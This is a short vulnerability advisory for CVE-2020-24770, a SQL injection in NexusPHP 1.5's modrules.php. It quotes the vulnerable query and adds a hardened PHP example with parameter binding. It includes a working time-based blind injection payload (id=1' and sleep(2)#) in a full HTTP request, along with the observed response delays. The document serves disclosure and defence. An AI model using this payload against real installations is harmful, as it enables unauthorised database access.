The attacker needs an administrator's identity to complete the attack.

CVE-2020-24770

Affected software: NexusPHP 1.5

Fixed version: nexusphp v1.6.0-beta2 https://github.com/xiaomlove/nexusphp/releases

Software Download Link: http://sourceforge.net/projects/nexusphp/

GitHub repository: https://github.com/xiaomlove/nexusphp

Vulnerability details

modrules.php:line 42

	$res = @mysql_fetch_array(@sql_query("select * from rules where id='$id'"));
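
For comparison, a hardened form of this lookup, added here as an example (it is not NexusPHP's code or the project's actual patch). It assumes PDO with an in-memory SQLite database standing in for the site's MySQL connection; the function name fetch_rule(), the title and text columns, and the sample row are constructed for illustration.

```php
<?php
// Added example: validate the id as an integer, then bind it as a parameter
// instead of concatenating it into the SQL string.

function fetch_rule(PDO $db, $rawId): ?array
{
    // 1. Allow-list the input: the id must be a positive decimal integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject instead of passing the string on to SQL
    }

    // 2. Bind the value; it never becomes part of the statement text.
    $stmt = $db->prepare('SELECT * FROM rules WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed test database (hypothetical schema, one sample row).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rules (id INTEGER PRIMARY KEY, title TEXT, text TEXT)');
$db->exec("INSERT INTO rules (id, title, text) VALUES (1, 'General', 'Sample rule')");

// The second value is the decoded id parameter from the request on this page.
$inputs = ['1', "1' and sleep(2)#", '-1', '2'];
foreach ($inputs as $in) {
    $row = fetch_rule($db, $in);
    printf("%-22s => %s\n", var_export($in, true),
        $row !== null ? 'row ' . $row['id'] : 'rejected or not found');
}
```

Only the first input returns a row; the quoted payload fails integer validation and never reaches the database.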

exploit:

GET /modrules.php?act=edit&id=1%27%20and%20sleep(2)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: administrator_cookies
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

/modrules.php?act=edit&id=1%27%20and%20sleep(2)%23

The response is delayed by 2 seconds.

/modrules.php?act=edit&id=1%27%20and%20sleep(0)%23

The response is delayed by 0 seconds.